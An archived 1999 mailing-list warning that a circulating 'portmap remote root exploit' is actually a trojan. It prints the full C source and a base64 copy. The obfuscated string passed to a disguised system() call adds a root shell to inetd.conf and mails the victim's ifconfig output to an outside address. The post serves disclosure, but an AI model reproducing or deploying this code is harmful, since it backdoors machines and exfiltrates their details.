This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---807922518-1961635173-935169810=:31229 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.10.9908201223441.31229at_private> Trojan being spread to clueless kiddies, claims to exploit portmap on Redhat boxes, really adds a rootshell to your inetd.conf file and sends other info like your ip address by executing ifconfig, it sends this mail to goat187at_private Code below and also attached. ------------------------------Snip--------------------------------------- /* Do not run unless you know what you are doing , and DONT RUN IT AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them your IP address. PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a TROJAN) portmap remote root linux exploit (TROJAN) (no stack patch) by horizon - jmcdonaldat_private This was tested against redhat box with 2.2.9 kernel. (shouldn't need offset) BIG thanks to stran9er who wrote this shellcode!! greets to: #!ADM and users @ el8.org ;) */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #define NOP 0x90 #define RET 0xbfffec90 #define PORT 5760 #define pmap_proc_p system char *shellcode = "\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9" "\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4" "\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73" "\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55" "\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a" "\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1" "\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62" "\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4" "\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99" "\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f"; int max(int x, int y) { if(x > y) return(x); return(y); } void rshell(char *host) { int sockfd, maxfd, n; struct sockaddr_in cli; char sendln[1024], recvln[1024]; struct hostent *hp; fd_set rset; if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if((hp = gethostbyname(host)) == NULL){ perror("gethostbyname"); exit(-1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(PORT); cli.sin_addr.s_addr = inet_addr(host); if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(-1); } printf("root shell found!\n"); strcpy(sendln, "uname -a; pwd; id;\n"); write(sockfd, sendln, strlen(sendln)); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(sendln, sizeof(sendln)); fgets(sendln, sizeof(sendln)-2, stdin); write(sockfd, sendln, strlen(sendln)); } if(FD_ISSET(sockfd, &rset)){ bzero(recvln, sizeof(recvln)); if((n = read(sockfd, recvln, sizeof(recvln))) == 0){ printf("Connection closed.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(recvln, stdout); } } } void main(int argc, char **argv) { CLIENT *cli; int i = 0, offset = 53; char *portmap; char *buf; if(argc < 2){ printf("usage: %s <ip> [offset]\n", argv[0]); exit(-1); } if((portmap = (char *) malloc(154)) == NULL) { perror("malloc"); } while(*shellcode) { portmap[i] = *shellcode - offset; shellcode++; i++; } pmap_proc_p(portmap); printf("sending shellcode... connecting to remote host\n"); rshell(argv[1]); strcpy(buf, portmap); exit(-1); } ---------------------------------------SNIP------------Snip---- ---807922518-1961635173-935169810=:31229 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="portmap.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.9908201223300.31229at_private> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="portmap.c" LyoNCg0KICAgICAgICBQUklWQVRFICEhISBETyBOT1QgRElTVFJJQlVURSBU SElTICEhISBQUklWQVRFDQogICAgICAgIHBvcnRtYXAgcmVtb3RlIHJvb3Qg bGludXggZXhwbG9pdCAobm8gc3RhY2sgcGF0Y2gpDQoJYnkgaG9yaXpvbiAt IGptY2RvbmFsZEB1bmYuZWR1DQoNCiAgICAgICAgVGhpcyB3YXMgdGVzdGVk IGFnYWluc3QgcmVkaGF0IGJveCB3aXRoIDIuMi45IGtlcm5lbC4NCiAgICAg ICAgKHNob3VsZG4ndCBuZWVkIG9mZnNldCkNCg0KICAgICAgICBCSUcgdGhh bmtzIHRvIHN0cmFuOWVyIHdobyB3cm90ZSB0aGlzIHNoZWxsY29kZSEhDQoN CiAgICAgICAgZ3JlZXRzIHRvOiAjIUFETSBhbmQgdXNlcnMgQCBlbDgub3Jn IDspDQoNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0 cmluZy5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8cnBjL3Jw Yy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMv dHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8 c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRl IDx1bmlzdGQuaD4NCg0KI2RlZmluZSBOT1AJMHg5MA0KI2RlZmluZSBSRVQJ MHhiZmZmZWM5MA0KI2RlZmluZSBQT1JUCTU3NjANCiNkZWZpbmUJcG1hcF9w cm9jX3Agc3lzdGVtDQoNCmNoYXIgKnNoZWxsY29kZSA9DQoiXHg2NFx4OTdc eDllXHhhM1x4NjRceDlhXHg5OFx4OWRceGE0XHg1NVx4NTdceDZiXHg2YVx4 NjZceDY4XHg2ZVx4NTVceGE4XHhhOSINCiJceGE3XHg5YVx4OTZceGEyXHg1 NVx4YTlceDk4XHhhNVx4NTVceGEzXHhhNFx4YWNceDk2XHg5ZVx4YTlceDU1 XHhhN1x4YTRceGE0Ig0KIlx4YTlceDU1XHg2NFx4OTdceDllXHhhM1x4NjRc eGE4XHg5ZFx4NTVceGE4XHg5ZFx4NTVceDYyXHg5ZVx4NTdceDU1XHg3M1x4 NzMiDQoiXHg1NVx4NjRceDlhXHhhOVx4OThceDY0XHg5ZVx4YTNceDlhXHhh OVx4OTlceDYzXHg5OFx4YTRceGEzXHg5Ylx4NTVceDcwXHg1NSINCiJceDY0 XHg5N1x4OWVceGEzXHg2NFx4YTBceDllXHhhMVx4YTFceDk2XHhhMVx4YTFc eDU1XHg2Mlx4NjZceDU1XHg5ZVx4YTNceDlhIg0KIlx4YTlceDk5XHg1NVx4 NjdceDczXHg1Ylx4NjZceDU1XHg2Nlx4NzNceDY0XHg5OVx4OWFceGFiXHg2 NFx4YTNceGFhXHhhMVx4YTEiDQoiXHg1NVx4NzBceDU1XHg2NFx4YThceDk3 XHg5ZVx4YTNceDY0XHg5ZVx4OWJceDk4XHhhNFx4YTNceDliXHg5ZVx4OWNc eDU1XHg2MiINCiJceDk2XHg1NVx4YjFceDU1XHhhMlx4OTZceDllXHhhMVx4 NTVceDljXHhhNFx4OTZceGE5XHg2Nlx4NmRceDZjXHg3NVx4OWRceGE0Ig0K Ilx4YTlceGEyXHg5Nlx4OWVceGExXHg2M1x4OThceGE0XHhhMlx4NTVceDY3 XHg3M1x4NWJceDY2XHg1NVx4NjdceDczXHg2NFx4OTkiDQoiXHg5YVx4YWJc eDY0XHhhM1x4YWFceGExXHhhMVx4M2YiOw0KDQppbnQgbWF4KGludCB4LCBp bnQgeSkNCnsNCiAgICAgICAgaWYoeCA+IHkpDQogICAgICAgICAgICAgICAg cmV0dXJuKHgpOw0KICAgICAgICByZXR1cm4oeSk7DQp9DQoNCnZvaWQgcnNo ZWxsKGNoYXIgKmhvc3QpDQp7DQogICAgICAgIGludCBzb2NrZmQsIG1heGZk LCBuOw0KICAgICAgICBzdHJ1Y3Qgc29ja2FkZHJfaW4gY2xpOw0KICAgICAg ICBjaGFyIHNlbmRsblsxMDI0XSwgcmVjdmxuWzEwMjRdOw0KICAgICAgICBz dHJ1Y3QgaG9zdGVudCAqaHA7DQogICAgICAgIGZkX3NldCByc2V0Ow0KDQog ICAgICAgIGlmKChzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJF QU0sIDApKSA8IDApew0KICAgICAgICAgICAgICAgIHBlcnJvcigic29ja2V0 Iik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiAg ICAgICAgaWYoKGhwID0gZ2V0aG9zdGJ5bmFtZShob3N0KSkgPT0gTlVMTCl7 DQogICAgICAgICAgICAgICAgcGVycm9yKCJnZXRob3N0YnluYW1lIik7DQoN CiAgICAgICAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KICAgICAg ICBiemVybygmY2xpLCBzaXplb2YoY2xpKSk7DQogICAgICAgIGNsaS5zaW5f ZmFtaWx5ID0gQUZfSU5FVDsNCiAgICAgICAgY2xpLnNpbl9wb3J0ID0gaHRv bnMoUE9SVCk7DQogICAgICAgIGNsaS5zaW5fYWRkci5zX2FkZHIgPSBpbmV0 X2FkZHIoaG9zdCk7DQogICAgICAgIGlmKGNvbm5lY3Qoc29ja2ZkLCAoc3Ry dWN0IHNvY2thZGRyICopJmNsaSwgc2l6ZW9mKGNsaSkpIDwgMCl7DQogICAg ICAgICAgICAgICAgcGVycm9yKCJjb25uZWN0Iik7DQogICAgICAgICAgICAg ICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiAgICAgICAgcHJpbnRmKCJyb290 IHNoZWxsIGZvdW5kIVxuIik7DQogICAgICAgIHN0cmNweShzZW5kbG4sICJ1 bmFtZSAtYTsgcHdkOyBpZDtcbiIpOw0KICAgICAgICB3cml0ZShzb2NrZmQs IHNlbmRsbiwgc3RybGVuKHNlbmRsbikpOw0KICAgICAgICBGRF9aRVJPKCZy c2V0KTsNCiAgICAgICAgZm9yKDs7KXsNCiAgICAgICAgICAgICAgICBGRF9T RVQoZmlsZW5vKHN0ZGluKSwgJnJzZXQpOw0KICAgICAgICAgICAgICAgIEZE X1NFVChzb2NrZmQsICZyc2V0KTsNCiAgICAgICAgICAgICAgICBtYXhmZCA9 IG1heChmaWxlbm8oc3RkaW4pLCBzb2NrZmQpICsgMTsNCiAgICAgICAgICAg ICAgICBzZWxlY3QobWF4ZmQsICZyc2V0LCBOVUxMLCBOVUxMLCBOVUxMKTsN CiAgICAgICAgICAgICAgICBpZihGRF9JU1NFVChmaWxlbm8oc3RkaW4pLCAm cnNldCkpew0KDQogICAgICAgICAgICAgICAgICAgICAgICBiemVybyhzZW5k bG4sIHNpemVvZihzZW5kbG4pKTsNCiAgICAgICAgICAgICAgICAgICAgICAg IGZnZXRzKHNlbmRsbiwgc2l6ZW9mKHNlbmRsbiktMiwgc3RkaW4pOw0KICAg ICAgICAgICAgICAgICAgICAgICAgd3JpdGUoc29ja2ZkLCBzZW5kbG4sIHN0 cmxlbihzZW5kbG4pKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAg ICAgICAgaWYoRkRfSVNTRVQoc29ja2ZkLCAmcnNldCkpew0KICAgICAgICAg ICAgICAgICAgICAgICAgYnplcm8ocmVjdmxuLCBzaXplb2YocmVjdmxuKSk7 DQogICAgICAgICAgICAgICAgICAgICAgICBpZigobiA9IHJlYWQoc29ja2Zk LCByZWN2bG4sIHNpemVvZihyZWN2bG4pKSkgPT0gMCl7DQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiQ29ubmVjdGlvbiBjbG9z ZWQuXG4iKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhp dCgwKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAg ICAgICAgICAgICAgIGlmKG4gPCAwKXsNCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgcGVycm9yKCJyZWFkIik7DQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGV4aXQoLTEpOw0KICAgICAgICAgICAgICAgICAg ICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAgICAgZnB1dHMocmVjdmxu LCBzdGRvdXQpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KfQ0K DQp2b2lkIG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgICAg ICBDTElFTlQgKmNsaTsNCiAgICAgICAgaW50IGkgPSAwLCBvZmZzZXQgPSA1 MzsNCgljaGFyICpwb3J0bWFwOw0KCWNoYXIgKmJ1ZjsNCg0KCSAgICAgICAg aWYoYXJnYyA8IDIpew0KICAgICAgICAgICAgICAgIAlwcmludGYoInVzYWdl OiAlcyA8aXA+IFtvZmZzZXRdXG4iLCBhcmd2WzBdKTsNCgkJCWV4aXQoLTEp Ow0KCQl9DQoNCglpZigocG9ydG1hcCA9IChjaGFyICopIG1hbGxvYygxNTQp KSA9PSBOVUxMKSB7DQoJCXBlcnJvcigibWFsbG9jIik7DQoJfQ0KDQoJd2hp bGUoKnNoZWxsY29kZSkgew0KCQlwb3J0bWFwW2ldID0gKnNoZWxsY29kZSAt IG9mZnNldDsJDQoJCXNoZWxsY29kZSsrOyBpKys7DQoJfQ0KDQoJcG1hcF9w cm9jX3AocG9ydG1hcCk7DQoNCglwcmludGYoInNlbmRpbmcgc2hlbGxjb2Rl Li4uIGNvbm5lY3RpbmcgdG8gcmVtb3RlIGhvc3RcbiIpOw0KCXJzaGVsbChh cmd2WzFdKTsNCgkNCglzdHJjcHkoYnVmLCBwb3J0bWFwKTsNCg0KCWV4aXQo LTEpOw0KfQkNCg== ---807922518-1961635173-935169810=:31229--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:39 PDT